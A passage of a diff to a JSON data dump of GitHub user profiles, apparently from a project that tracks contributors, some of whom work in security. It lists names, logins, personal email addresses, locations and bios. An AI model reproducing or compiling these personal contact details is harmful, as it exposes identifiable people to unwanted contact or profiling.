"2024-09-22T10:39:02.029Z", + "nest_updated_at": "2024-09-22T20:24:16.604Z", + "name": "Jonathan Thompson", + "login": "nojanath", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/44535257?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4381314?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 30, - "public_gists_count": 55, - "public_repositories_count": 1050, - "created_at": "2018-10-27T22:12:19Z", - "updated_at": "2024-09-08T03:40:37Z", - "node_id": "MDQ6VXNlcjQ0NTM1MjU3", + "following_count": 3, + "followers_count": 12, + "public_gists_count": 3, + "public_repositories_count": 20, + "created_at": "2013-05-08T21:51:51Z", + "updated_at": "2024-09-15T18:13:07Z", + "node_id": "MDQ6VXNlcjQzODEzMTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436753,74 +697052,74 @@ }, { "model": "github.user", - "pk": 3061, + "pk": 8446, "fields": { - "nest_created_at": "2024-09-12T03:13:23.893Z", - "nest_updated_at": "2024-09-12T03:13:23.893Z", - "name": "", - "login": "ZeroDot1", - "email": "zerodot1@bk.ru", - "avatar_url": "https://avatars.githubusercontent.com/u/28985171?v=4", + "nest_created_at": "2024-09-22T10:39:02.998Z", + "nest_updated_at": "2024-09-22T20:24:17.568Z", + "name": "Kristoffer Schneider", + "login": "derfalx", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4299689?v=4", "company": "", - "location": "Germany", + "location": " Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 7, - "public_repositories_count": 33, - "created_at": "2017-05-26T15:46:11Z", - "updated_at": "2024-06-11T11:27:23Z", - "node_id": "MDQ6VXNlcjI4OTg1MTcx", - "bio": "Independent Security Researcher, #CoinBlockerLists\r\n\r\nLogo created by: https://twitter.com/euphoricfall", - "is_hireable": false, - "twitter_username": "zero_dot1" + "following_count": 209, + "followers_count": 77, + "public_gists_count": 12, + "public_repositories_count": 17, + "created_at": "2013-04-30T06:54:42Z", + "updated_at": "2024-09-19T13:30:03Z", + "node_id": "MDQ6VXNlcjQyOTk2ODk=", + "bio": "Something with information security and programming.\r\n\r\n\r\nWork-Account: @KTBL-KristofferSchneider", + "is_hireable": true, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3062, + "pk": 8447, "fields": { - "nest_created_at": "2024-09-12T03:13:24.714Z", - "nest_updated_at": "2024-09-12T03:13:24.714Z", - "name": "mehmet salih bindak", - "login": "cyb3rsalih", - "email": "mehmetsalihbindak@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/17196669?v=4", + "nest_created_at": "2024-09-22T10:39:03.636Z", + "nest_updated_at": "2024-09-22T20:24:18.298Z", + "name": "Maxim Masiutin", + "login": "maximmasiutin", + "email": "maxim@masiutin.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25011752?v=4", "company": "", - "location": "TR", + "location": "Chisinau, Republic of Moldova", "collaborators_count": 0, - "following_count": 38, - "followers_count": 23, - "public_gists_count": 40, - "public_repositories_count": 61, - "created_at": "2016-02-12T11:45:37Z", - "updated_at": "2024-08-20T11:37:38Z", - "node_id": "MDQ6VXNlcjE3MTk2NjY5", - "bio": "Mobile Developer", + "following_count": 4, + "followers_count": 41, + "public_gists_count": 2, + "public_repositories_count": 57, + "created_at": "2017-01-09T16:06:15Z", + "updated_at": "2024-09-13T12:28:01Z", + "node_id": "MDQ6VXNlcjI1MDExNzUy", + "bio": "", "is_hireable": false, - "twitter_username": "msalihb" + "twitter_username": "MaximMasiutin" } }, { "model": "github.user", - "pk": 3063, + "pk": 8448, "fields": { - "nest_created_at": "2024-09-12T03:13:25.514Z", - "nest_updated_at": "2024-09-12T03:13:25.514Z", - "name": "Mateusz", - "login": "as-km", + "nest_created_at": "2024-09-22T10:39:04.287Z", + "nest_updated_at": "2024-09-22T20:24:19.004Z", + "name": "Mike Robinson", + "login": "multiwebinc", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/55695113?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/901732?v=4", "company": "", - "location": "", + "location": "Costa Rica", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-09-23T11:23:47Z", - "updated_at": "2024-08-12T09:12:36Z", - "node_id": "MDQ6VXNlcjU1Njk1MTEz", + "followers_count": 27, + "public_gists_count": 1, + "public_repositories_count": 69, + "created_at": "2011-07-07T23:11:04Z", + "updated_at": "2024-09-02T22:49:30Z", + "node_id": "MDQ6VXNlcjkwMTczMg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436828,24 +697127,24 @@ }, { "model": "github.user", - "pk": 3064, + "pk": 8449, "fields": { - "nest_created_at": "2024-09-12T03:13:26.332Z", - "nest_updated_at": "2024-09-12T03:13:26.332Z", - "name": "iambatman", - "login": "MR-pentestGuy", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/71591447?v=4", + "nest_created_at": "2024-09-22T10:39:04.928Z", + "nest_updated_at": "2024-09-22T20:24:19.631Z", + "name": "NatasG", + "login": "NatasG", + "email": "gaoshuai1205@126.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2890202?v=4", "company": "", - "location": "", + "location": "西安", "collaborators_count": 0, - "following_count": 5, - "followers_count": 14, + "following_count": 40, + "followers_count": 32, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2020-09-20T11:13:57Z", - "updated_at": "2024-07-24T11:08:28Z", - "node_id": "MDQ6VXNlcjcxNTkxNDQ3", + "public_repositories_count": 46, + "created_at": "2012-11-26T08:29:00Z", + "updated_at": "2024-09-01T11:23:34Z", + "node_id": "MDQ6VXNlcjI4OTAyMDI=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -436853,49 +697152,49 @@ }, { "model": "github.user", - "pk": 3065, + "pk": 8450, "fields": { - "nest_created_at": "2024-09-12T03:13:27.130Z", - "nest_updated_at": "2024-09-12T03:13:27.130Z", - "name": "", - "login": "rabx", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4164301?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:39:05.244Z", + "nest_updated_at": "2024-09-22T20:24:19.943Z", + "name": "Patrick Double", + "login": "double16", + "email": "pat@patdouble.com", + "avatar_url": "https://avatars.githubusercontent.com/u/5640233?v=4", + "company": "@improving @objectpartners ", + "location": "USA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 27, - "created_at": "2013-04-15T19:52:09Z", - "updated_at": "2024-09-07T01:24:42Z", - "node_id": "MDQ6VXNlcjQxNjQzMDE=", - "bio": "", + "following_count": 20, + "followers_count": 24, + "public_gists_count": 23, + "public_repositories_count": 128, + "created_at": "2013-10-08T16:52:40Z", + "updated_at": "2024-09-05T08:26:11Z", + "node_id": "MDQ6VXNlcjU2NDAyMzM=", + "bio": "Software Engineer, Cyber Security, OSCP, OSWA, CISSP\r\n", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3066, + "pk": 8451, "fields": { - "nest_created_at": "2024-09-12T03:13:27.982Z", - "nest_updated_at": "2024-09-12T03:13:27.982Z", - "name": "BugMania", - "login": "knowthetech", + "nest_created_at": "2024-09-22T10:39:05.554Z", + "nest_updated_at": "2024-09-22T20:24:20.258Z", + "name": "‽ѧџŁ ℳørệ№", + "login": "domconscious", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/52136037?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1709277?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 23, + "following_count": 1, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2019-06-23T17:46:21Z", - "updated_at": "2024-08-30T12:57:17Z", - "node_id": "MDQ6VXNlcjUyMTM2MDM3", + "public_repositories_count": 6, + "created_at": "2012-05-05T19:25:59Z", + "updated_at": "2023-01-18T20:37:43Z", + "node_id": "MDQ6VXNlcjE3MDkyNzc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436903,24 +697202,24 @@ }, { "model": "github.user", - "pk": 3067, + "pk": 8452, "fields": { - "nest_created_at": "2024-09-12T03:13:28.808Z", - "nest_updated_at": "2024-09-12T03:13:28.808Z", - "name": "", - "login": "zfxlg01", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/86958586?v=4", + "nest_created_at": "2024-09-22T10:40:43.878Z", + "nest_updated_at": "2024-09-22T20:25:55.030Z", + "name": "Tao Sauvage", + "login": "DePierre", + "email": "sauvage.tao@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/923297?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2021-07-05T10:15:30Z", - "updated_at": "2023-06-23T09:10:38Z", - "node_id": "MDQ6VXNlcjg2OTU4NTg2", + "following_count": 2, + "followers_count": 28, + "public_gists_count": 6, + "public_repositories_count": 21, + "created_at": "2011-07-18T16:16:59Z", + "updated_at": "2024-09-05T14:41:58Z", + "node_id": "MDQ6VXNlcjkyMzI5Nw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -436928,99 +697227,124 @@ }, { "model": "github.user", - "pk": 3068, + "pk": 8453, "fields": { - "nest_created_at": "2024-09-12T03:13:29.614Z", - "nest_updated_at": "2024-09-12T03:13:52.187Z", - "name": "Pham Sy Minh", - "login": "shelld3v", + "nest_created_at": "2024-09-22T10:40:44.188Z", + "nest_updated_at": "2024-09-22T20:25:55.341Z", + "name": "Assem Ch", + "login": "assem-ch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/59408894?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/315228?v=4", "company": "", - "location": "Hanoi, Vietnam", + "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 359, - "public_gists_count": 2, - "public_repositories_count": 63, - "created_at": "2020-01-01T09:03:59Z", - "updated_at": "2023-11-09T10:27:46Z", - "node_id": "MDQ6VXNlcjU5NDA4ODk0", - "bio": "Cyber security enthusiast and jobless coder", + "following_count": 87, + "followers_count": 516, + "public_gists_count": 6, + "public_repositories_count": 97, + "created_at": "2010-06-26T14:38:15Z", + "updated_at": "2024-09-22T13:46:03Z", + "node_id": "MDQ6VXNlcjMxNTIyOA==", + "bio": "Building software ", + "is_hireable": true, + "twitter_username": "assem_ch" + } +}, +{ + "model": "github.user", + "pk": 8454, + "fields": { + "nest_created_at": "2024-09-22T10:40:44.497Z", + "nest_updated_at": "2024-09-22T20:25:55.695Z", + "name": "Anshul Singhal", + "login": "saganshul", + "email": "sganshuliiith@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11960067?v=4", + "company": "", + "location": "/dev/urandom", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 57, + "public_gists_count": 0, + "public_repositories_count": 42, + "created_at": "2015-04-15T10:51:45Z", + "updated_at": "2024-08-12T18:39:07Z", + "node_id": "MDQ6VXNlcjExOTYwMDY3", + "bio": "", "is_hireable": false, - "twitter_username": "shells3c_" + "twitter_username": "sganshul123" } }, { "model": "github.user", - "pk": 3069, + "pk": 8455, "fields": { - "nest_created_at": "2024-09-12T03:13:30.445Z", - "nest_updated_at": "2024-09-12T03:13:30.445Z", - "name": "Patrik Fehrenbach", - "login": "PatrikFehrenbach", + "nest_created_at": "2024-09-22T10:40:44.805Z", + "nest_updated_at": "2024-09-22T20:25:56.043Z", + "name": "", + "login": "alessandrofg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9072595?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1225975?v=4", "company": "", - "location": "Deutschland", + "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 270, - "public_gists_count": 4, - "public_repositories_count": 18, - "created_at": "2014-10-08T08:10:38Z", - "updated_at": "2024-09-06T15:02:34Z", - "node_id": "MDQ6VXNlcjkwNzI1OTU=", - "bio": "Hello! I'm Patrik, a cybersecurity enthusiast with a keen interest in the dynamic field of bug bounty hunting. With a background in computer science ", - "is_hireable": true, - "twitter_username": "itsecurityguard" + "following_count": 0, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2011-11-28T17:51:52Z", + "updated_at": "2023-05-26T10:23:10Z", + "node_id": "MDQ6VXNlcjEyMjU5NzU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3070, + "pk": 8456, "fields": { - "nest_created_at": "2024-09-12T03:13:31.277Z", - "nest_updated_at": "2024-09-12T03:13:31.277Z", - "name": "Postmodern", - "login": "postmodern", - "email": "postmodern.mod3@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/12671?v=4", + "nest_created_at": "2024-09-22T10:40:45.425Z", + "nest_updated_at": "2024-09-22T20:25:56.668Z", + "name": "Amit Gupta", + "login": "DarKnight24", + "email": "05.DarKnight.11@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6971456?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 86, - "followers_count": 974, - "public_gists_count": 103, - "public_repositories_count": 202, - "created_at": "2008-06-05T06:47:44Z", - "updated_at": "2024-07-20T00:55:50Z", - "node_id": "MDQ6VXNlcjEyNjcx", - "bio": "Software Engineer, Open Source developer and maintainer, sometimes InfoSec. Ruby, Crystal, Bash.", + "following_count": 7, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 23, + "created_at": "2014-03-17T04:48:10Z", + "updated_at": "2023-06-28T07:17:58Z", + "node_id": "MDQ6VXNlcjY5NzE0NTY=", + "bio": "", "is_hireable": false, - "twitter_username": "postmodern_mod3" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3071, + "pk": 8457, "fields": { - "nest_created_at": "2024-09-12T03:13:32.118Z", - "nest_updated_at": "2024-09-12T03:13:32.118Z", - "name": "", - "login": "Isaac21e", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/35118577?v=4", + "nest_created_at": "2024-09-22T10:40:46.060Z", + "nest_updated_at": "2024-09-22T20:25:57.288Z", + "name": "Ankush Jindal", + "login": "ankushjindal278", + "email": "ankushjindal278@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4208687?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2018-01-04T23:09:09Z", - "updated_at": "2024-08-15T11:11:28Z", - "node_id": "MDQ6VXNlcjM1MTE4NTc3", + "public_repositories_count": 0, + "created_at": "2013-04-20T09:12:15Z", + "updated_at": "2020-06-11T08:10:06Z", + "node_id": "MDQ6VXNlcjQyMDg2ODc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437028,74 +697352,74 @@ }, { "model": "github.user", - "pk": 3072, + "pk": 8458, "fields": { - "nest_created_at": "2024-09-12T03:13:32.914Z", - "nest_updated_at": "2024-09-12T03:14:48.438Z", - "name": "", - "login": "nil0x42", + "nest_created_at": "2024-09-22T10:40:47.019Z", + "nest_updated_at": "2024-09-22T20:25:58.311Z", + "name": "Anirudh Anand", + "login": "a0xnirudh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3504393?v=4", - "company": "Exdemia IT Security", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5573458?v=4", + "company": "https://blog.0daylabs.com", + "location": "India", "collaborators_count": 0, - "following_count": 69, - "followers_count": 481, - "public_gists_count": 19, - "public_repositories_count": 14, - "created_at": "2013-02-07T18:47:30Z", - "updated_at": "2024-09-01T11:23:57Z", - "node_id": "MDQ6VXNlcjM1MDQzOTM=", + "following_count": 24, + "followers_count": 103, + "public_gists_count": 2, + "public_repositories_count": 52, + "created_at": "2013-09-30T05:13:47Z", + "updated_at": "2024-04-20T15:18:38Z", + "node_id": "MDQ6VXNlcjU1NzM0NTg=", "bio": "", "is_hireable": true, - "twitter_username": "nil0x42" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3073, + "pk": 8459, "fields": { - "nest_created_at": "2024-09-12T03:13:33.735Z", - "nest_updated_at": "2024-09-12T03:13:33.735Z", - "name": "Solomon Sklash", - "login": "SolomonSklash", - "email": "solomonsklash@0xfeed.io", - "avatar_url": "https://avatars.githubusercontent.com/u/43149956?v=4", + "nest_created_at": "2024-09-22T10:40:47.337Z", + "nest_updated_at": "2024-09-22T20:25:58.656Z", + "name": "Marios", + "login": "marioskourtesis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4330999?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 55, - "followers_count": 417, - "public_gists_count": 28, - "public_repositories_count": 216, - "created_at": "2018-09-10T18:27:43Z", - "updated_at": "2024-08-09T16:24:10Z", - "node_id": "MDQ6VXNlcjQzMTQ5OTU2", - "bio": "Offensive security.", + "following_count": 4, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2013-05-03T12:06:01Z", + "updated_at": "2024-02-05T20:08:46Z", + "node_id": "MDQ6VXNlcjQzMzA5OTk=", + "bio": "", "is_hireable": false, - "twitter_username": "SolomonSklash" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3074, + "pk": 8460, "fields": { - "nest_created_at": "2024-09-12T03:13:35.443Z", - "nest_updated_at": "2024-09-12T03:13:45.479Z", + "nest_created_at": "2024-09-22T10:40:47.671Z", + "nest_updated_at": "2024-09-22T20:25:58.991Z", "name": "", - "login": "UFeindschiff", + "login": "delta24", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2279391?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/26123482?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2012-09-04T17:38:33Z", - "updated_at": "2024-05-14T17:48:07Z", - "node_id": "MDQ6VXNlcjIyNzkzOTE=", + "public_gists_count": 11, + "public_repositories_count": 0, + "created_at": "2017-03-01T19:46:15Z", + "updated_at": "2017-06-29T22:07:38Z", + "node_id": "MDQ6VXNlcjI2MTIzNDgy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437103,99 +697427,149 @@ }, { "model": "github.user", - "pk": 3075, + "pk": 8461, "fields": { - "nest_created_at": "2024-09-12T03:13:36.249Z", - "nest_updated_at": "2024-09-12T03:13:36.250Z", - "name": "", - "login": "WesWrench", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/31844088?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T10:40:47.981Z", + "nest_updated_at": "2024-09-22T20:25:59.302Z", + "name": "Deepesh Pathak", + "login": "fristonio", + "email": "deepshpathak@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/21292343?v=4", + "company": "@cilium @sdslabs", + "location": "WUPHF", "collaborators_count": 0, - "following_count": 11, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 6, - "created_at": "2017-09-11T08:13:47Z", - "updated_at": "2024-08-27T09:06:34Z", - "node_id": "MDQ6VXNlcjMxODQ0MDg4", - "bio": "", + "following_count": 165, + "followers_count": 192, + "public_gists_count": 15, + "public_repositories_count": 50, + "created_at": "2016-08-28T14:00:31Z", + "updated_at": "2024-08-24T11:33:12Z", + "node_id": "MDQ6VXNlcjIxMjkyMzQz", + "bio": "...", "is_hireable": false, - "twitter_username": "" + "twitter_username": "fristonio" } }, { "model": "github.user", - "pk": 3076, + "pk": 8462, "fields": { - "nest_created_at": "2024-09-12T03:13:37.119Z", - "nest_updated_at": "2024-09-12T03:13:37.119Z", - "name": "", - "login": "MdBulbulHosain", + "nest_created_at": "2024-09-22T10:40:48.294Z", + "nest_updated_at": "2024-09-22T20:26:17.435Z", + "name": "Alexandra Sandulescu", + "login": "alexandrasandulescu", + "email": "alecsandra.sandulescu@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2550548?v=4", + "company": "Google", + "location": "Zurich", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 31, + "public_gists_count": 2, + "public_repositories_count": 20, + "created_at": "2012-10-13T08:58:21Z", + "updated_at": "2024-08-08T09:00:13Z", + "node_id": "MDQ6VXNlcjI1NTA1NDg=", + "bio": "int 0x3", + "is_hireable": true, + "twitter_username": "fkaasan" + } +}, +{ + "model": "github.user", + "pk": 8463, + "fields": { + "nest_created_at": "2024-09-22T10:40:48.926Z", + "nest_updated_at": "2024-09-22T20:26:00.269Z", + "name": "Deep Shah", + "login": "dshah133", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95719231?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4558619?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 23, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2021-12-07T20:50:51Z", - "updated_at": "2023-08-12T08:35:23Z", - "node_id": "U_kgDOBbSPPw", + "public_repositories_count": 35, + "created_at": "2013-05-29T10:06:21Z", + "updated_at": "2024-02-13T18:15:18Z", + "node_id": "MDQ6VXNlcjQ1NTg2MTk=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3077, + "pk": 8464, "fields": { - "nest_created_at": "2024-09-12T03:13:37.935Z", - "nest_updated_at": "2024-09-12T03:13:37.935Z", - "name": "Obad Zafar", - "login": "Obad94", - "email": "zafarobad@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29942077?v=4", - "company": "NED University of Engineering & Technology", - "location": "Karachi, Pakistan", + "nest_created_at": "2024-09-22T10:40:49.238Z", + "nest_updated_at": "2024-09-22T20:26:00.577Z", + "name": "Sachin Kamath", + "login": "pwnfoo", + "email": "github@skamath.me", + "avatar_url": "https://avatars.githubusercontent.com/u/9546091?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 106, + "followers_count": 244, + "public_gists_count": 26, + "public_repositories_count": 151, + "created_at": "2014-11-04T04:37:21Z", + "updated_at": "2024-08-27T12:15:43Z", + "node_id": "MDQ6VXNlcjk1NDYwOTE=", + "bio": "Security, blockchain and the likes.", + "is_hireable": true, + "twitter_username": "pwnfoo" + } +}, +{ + "model": "github.user", + "pk": 8465, + "fields": { + "nest_created_at": "2024-09-22T10:40:49.899Z", + "nest_updated_at": "2024-09-22T20:26:01.274Z", + "name": "Pau Ferrer Cid", + "login": "pau-ferrer-cid", + "email": "pauferrercid12@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11819820?v=4", + "company": "", + "location": "Spain", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2017-07-06T07:16:02Z", - "updated_at": "2024-08-16T09:42:46Z", - "node_id": "MDQ6VXNlcjI5OTQyMDc3", - "bio": "", + "public_repositories_count": 2, + "created_at": "2015-04-06T15:24:35Z", + "updated_at": "2023-06-14T09:28:44Z", + "node_id": "MDQ6VXNlcjExODE5ODIw", + "bio": "I am a computer engineer with a strong background in quantitative fields such as machine learning, data science, and statistics.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 3078, + "pk": 8466, "fields": { - "nest_created_at": "2024-09-12T03:13:38.766Z", - "nest_updated_at": "2024-09-12T03:13:38.766Z", - "name": "Aidan Barrington", - "login": "nvqna", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2392934?v=4", + "nest_created_at": "2024-09-22T10:40:50.209Z", + "nest_updated_at": "2024-09-22T20:26:01.592Z", + "name": "Rahul Pratap Singh", + "login": "RahulPratapSingh", + "email": "techno.rps@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8836104?v=4", "company": "", - "location": "NYC", + "location": "New Delhi", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 17, - "public_repositories_count": 23, - "created_at": "2012-09-21T11:07:37Z", - "updated_at": "2024-08-20T21:12:51Z", - "node_id": "MDQ6VXNlcjIzOTI5MzQ=", + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2014-09-19T18:20:45Z", + "updated_at": "2024-06-11T20:49:51Z", + "node_id": "MDQ6VXNlcjg4MzYxMDQ=", "bio": "", "is_hireable": true, "twitter_username": "" @@ -437203,74 +697577,74 @@ }, { "model": "github.user", - "pk": 3079, + "pk": 8467, "fields": { - "nest_created_at": "2024-09-12T03:13:39.609Z", - "nest_updated_at": "2024-09-12T03:13:39.609Z", - "name": "softScheck GmbH", - "login": "softScheck", + "nest_created_at": "2024-09-22T10:40:50.524Z", + "nest_updated_at": "2024-09-22T20:26:01.903Z", + "name": "", + "login": "affinity7", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20166884?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/20950371?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 55, - "public_gists_count": 5, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, "public_repositories_count": 7, - "created_at": "2016-06-27T12:08:56Z", - "updated_at": "2024-08-28T09:09:19Z", - "node_id": "MDQ6VXNlcjIwMTY2ODg0", - "bio": "We identify vulnerabilities others don't.", + "created_at": "2016-08-10T13:42:11Z", + "updated_at": "2017-09-08T10:54:50Z", + "node_id": "MDQ6VXNlcjIwOTUwMzcx", + "bio": "", "is_hireable": false, - "twitter_username": "softScheck" + "twitter_username": "" } }, { "model": "github.user", - "pk": 3080, + "pk": 8468, "fields": { - "nest_created_at": "2024-09-12T03:13:40.475Z", - "nest_updated_at": "2024-09-12T03:13:40.475Z", + "nest_created_at": "2024-09-22T10:40:50.836Z", + "nest_updated_at": "2024-09-22T20:26:02.215Z", "name": "", - "login": "intrd", + "login": "csk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2204686?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/153092?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 74, - "followers_count": 89, - "public_gists_count": 80, - "public_repositories_count": 19, - "created_at": "2012-08-23T14:23:46Z", - "updated_at": "2024-08-23T17:12:00Z", - "node_id": "MDQ6VXNlcjIyMDQ2ODY=", - "bio": "", - "is_hireable": true, - "twitter_username": "intrd" + "following_count": 18, + "followers_count": 15, + "public_gists_count": 2, + "public_repositories_count": 21, + "created_at": "2009-11-14T01:21:54Z", + "updated_at": "2024-09-02T18:29:00Z", + "node_id": "MDQ6VXNlcjE1MzA5Mg==", + "bio": "Just a guy with curiosity and a coffee ☕️ in the hand", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 3081, + "pk": 8469, "fields": { - "nest_created_at": "2024-09-12T03:13:43.808Z", - "nest_updated_at": "2024-09-12T03:13:43.808Z", - "name": "", - "login": "gaalos", + "nest_created_at": "2024-09-22T10:40:51.151Z", + "nest_updated_at": "2024-09-22T20:26:02.540Z", + "name": "Ayush Singh", + "login": "DoomTaper", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/32361668?v=4", - "company": "rog", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10975138?v=4", + "company": "", + "location": "Noida, India", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, + "following_count": 7, + "followers_count": 7, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-09-28T12:21:21Z", - "updated_at": "2024-03-23T17:11:19Z", - "node_id": "MDQ6VXNlcjMyMzYxNjY4", + "public_repositories_count": 25, + "created_at": "2015-02-12T10:57:34Z", + "updated_at": "2024-08-24T10:37:37Z", + "node_id": "MDQ6VXNlcjEwOTc1MTM4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -437278,149 +697652,174 @@ }, { "model": "github.user", - "pk": 3082, + "pk": 8470, "fields": { - "nest_created_at": "2024-09-12T03:13:47.145Z", - "nest_updated_at": "2024-09-12T03:13:47.145Z", - "name": "", - "login": "wellencamass", + "nest_created_at": "2024-09-22T10:40:51.481Z", + "nest_updated_at": "2024-09-22T20:26:02.858Z", + "name": "Ramana Sundararaman", + "login": "Sentient07", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/77920409?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6195312?v=4", "company": "", - "location": "", + "location": "Goa, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2021-01-24T10:56:39Z", - "updated_at": "2022-03-24T11:10:12Z", - "node_id": "MDQ6VXNlcjc3OTIwNDA5", + "following_count": 45, + "followers_count": 42, + "public_gists_count": 15, + "public_repositories_count": 33, + "created_at": "2013-12-16T08:27:31Z", + "updated_at": "2024-09-14T17:15:29Z", + "node_id": "MDQ6VXNlcjYxOTUzMTI=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 3083, + "pk": 8471, "fields": { - "nest_created_at": "2024-09-12T03:13:47.957Z", - "nest_updated_at": "2024-09-12T03:13:47.957Z", - "name": "abhinavsecond", - "login": "abhinavsecond", + "nest_created_at": "2024-09-22T10:40:51.802Z", + "nest_updated_at": "2024-09-22T20:26:17.889Z", + "name": "Gorantla Krishna", + "login": "Ahiknsr", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103136282?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6847350?v=4", + "company": "@facebook", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-04-06T16:43:56Z", - "updated_at": "2023-05-23T14:25:32Z", - "node_id": "U_kgDOBiW8Gg", + "following_count": 8, 